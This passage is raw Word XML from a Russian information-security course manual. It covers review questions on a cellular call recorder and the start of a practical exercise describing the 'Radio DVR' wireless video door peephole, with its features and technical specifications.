          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для чего необходим а</w:t>
      </w:r>
      <w:r w:rsidRPr="009165A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>втономный регистратор сотовых разговоров SpRecord SpGate MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Какие с</w:t>
      </w:r>
      <w:r w:rsidRPr="009165A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>остояния индикаторов сотового регистратора</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> вы знаете?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Как проводится настройка записи разговоров?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD712C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc3808620"/>
      <w:r>
        <w:t>Вопросы для защиты  работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc3808621"/>
      <w:r>
        <w:t>Вопрос 1. Общие понятия.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc3808622"/>
      <w:r>
        <w:t>Вопрос 2. Технические каналы утечки информации.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc3808623"/>
      <w:r>
        <w:t>Вопрос 3. Опасные сигналы и их источники. (П)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006841B7" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc508055965"/>
      <w:bookmarkStart w:id="54" w:name="_Toc3808624"/>
      <w:r w:rsidRPr="006841B7">
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006841B7">
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkStart w:id="55" w:name="_Toc508055966"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006841B7">
        <w:t>Видеоглазок беспроводной Radio DVR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006841B7" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006841B7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>провести анализ беспроводного цифрового видеоглазка «Radio DVR» и осуществить настройку видеоглазка с монитором по беспроводному каналу</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="006841B7" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006841B7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Беспроводной цифровой видеоглазок «Radio DVR» </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> это отличная, высокотехнологичная и удобная альтернатива традиционному глазку. Благодаря широкоугольной цветной камере и большому 5-ти дюймовому дисплею, вы сможете просматривать обстановку перед дверью, отчётливо видеть лицо посетителя, и даже производить запись видеоизображений и фотографий на съёмную карту памяти. Максимальный объём карты памяти составляет 32 Гигабайта, которых хватит для сохранения более 42 часов видеозаписей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Связь дверного видеоглазка с монитором осуществляется по беспроводному радиоканалу на частоте 5,8 ГГц, что позволяет использовать монитор в портативном режиме и получать изображение с камеры, находясь в любой комнате, входящей в радиус действия радиосвязи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Область применения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дверной беспроводной видеоглазок «Radio DVR» предназначен для более комфортной идентификации посетителей, в альтернативу традиционному глазку. Таким образом, видеоглазок станет отличным решением для офисов, квартир и частных домов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Наибольшее удобство видеоглазок предоставит пожилым людям, инвалидам, детям и людям, имеющим проблемы со зрением, поскольку с данным устройством им не придётся идти к двери, всматриваться в маленький </w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>дверной глазок – удобный переносной дисплей идеально и отчётливо отобразит все, что происходит перед дверью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При активации режима «запись по движению» вы всегда сможете знать, кто приходил в момент вашего отсутствия или «крутился» возле вашей двери.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Особенности устройства:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0"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Большой 5-ти дюймовый TFT монитор</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> с хорошей яркостью и цветопередачей, идеально отобразит всё, что попадает в захват видеоглазка. На экране вы отчётливо рассмотрите гостя, а так же сможете просматривать записа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нные видеоролики и фотографии.</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Беспроводная технология связи</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, осуществляемая по радиоканалу на частоте 5,8, ГГц даёт возможность легко и быстро монтировать устройство без прокладки кабелей, а так же использовать монитор-регис</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тратор в портативном варианте.</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Запись по датчику движения.</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> При активации данной функции, видеоглазок будет включать видеозапись каждый раз, как перед объективом глазка появится</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> движущийся объект.</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Ручная запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. В любой момент, вы сможете самостоятельно включить видеозапись изображения с ка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>меры или сохранить фотографию.</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Поддержка карты памяти.</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Установив в корпус монитора карту памяти типа microSD ёмкостью до 32 Гб, можно сохранить видеозаписи общей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>длительностью до 42 часов.</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Полностью русифицированное меню и интуитивно-понятный интерфейс</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> позволят легко и быстро освоить все опции и принцип работы,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> даже неопытному пользователю.</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Режим циклической записи</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> даст возможность вести непрерывную запись даже при нехватке места на карте памяти. Это осуществляется методом удаления устаревших роликов, для записи на их место новых. Видеозаписи сохраняются отрезками длительностью по 10, 30 или 60 минут в зависимости от</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> настроек.</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Режим энергосбережения</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> предусматривает автоматическое отключение дисплея при неактивности по истечению установле</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нного времени (1 или 5 минут).</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Стилизация видеоглазка под обычный глазок.</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> Корпус устройства изготовлен из латунного материала и по внешнему виду полностью соответствует традиционному дверному глазку, благодаря чему, никто из посетителей или прохожих не будет подозревать о работе цифрового устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Принцип действия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Беспроводной цветной видеоглазок «Radio DVR» устанавливается в отверстие дверного полотна, вместо традиционного глазка. Посредством </w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>радиосвязи видеоизображение передаётся на монитор, где можно сохранять видеозаписи и фотоснимки. Так же устройство может автоматически записывать видеоизображение при появлении в кадре движущегося объекта. Все данные сохраняются на съёмную карту памяти microSD ёмкостью до 32Гб.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технические характеристики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Видеоглазок</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Латунный корпус</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Частота передачи: 5.8 ГГц</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Разрешение: 520 ТВЛ</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Угол обзора: 90 градусов</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Дальность передачи сигнала: до 75 метров (без преград)</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Дальность передачи с учетом одной стены: 15-30 метров</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Толщина двери: 40-60 мм</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Диаметр отверстия: 14 мм</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Диаметр глазка: 25 мм</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Питание: 4В, 1А</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Рабочая температура: от -20 до +50 гр.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Монитор</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Диагональ экрана: 5 дюймов</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Частота приема: 5.8 ГГц</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Поддержка SD-карт: microSD до 32Гб</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Разрешение экрана: 800*480 пикселей</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Разрешение видео: 720x576 25 к/сек PAL, 720x480 30 к/сек NTSC</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Формат видеозаписи: AVI</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Адаптер питания: 5В</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Время работы встроенного аккумулятора:</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>- в режиме записи: 6.5 часов</w:t>
      </w:r>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>- в режиме записи и просмотра: 5 часов</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Воспроизведение аудио</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Размер: 130 х 87 х 17 мм</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Вес: 210 грамм</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Рабочая температура: от – 10 до + 50 градусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Комплектация</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Беспроводной видеоглазок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Монитор-регистратор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Стереонаушники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A/V кабель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USB-кабель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Блок питания для монитора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Блок питания для глазка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lastRenderedPageBreak/>
        <w:t>Держатель для монитора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Переходник для выносной антенны – 1 шт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00624665" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624665">
        <w:rPr>
          <w:color w:val="000000"/>
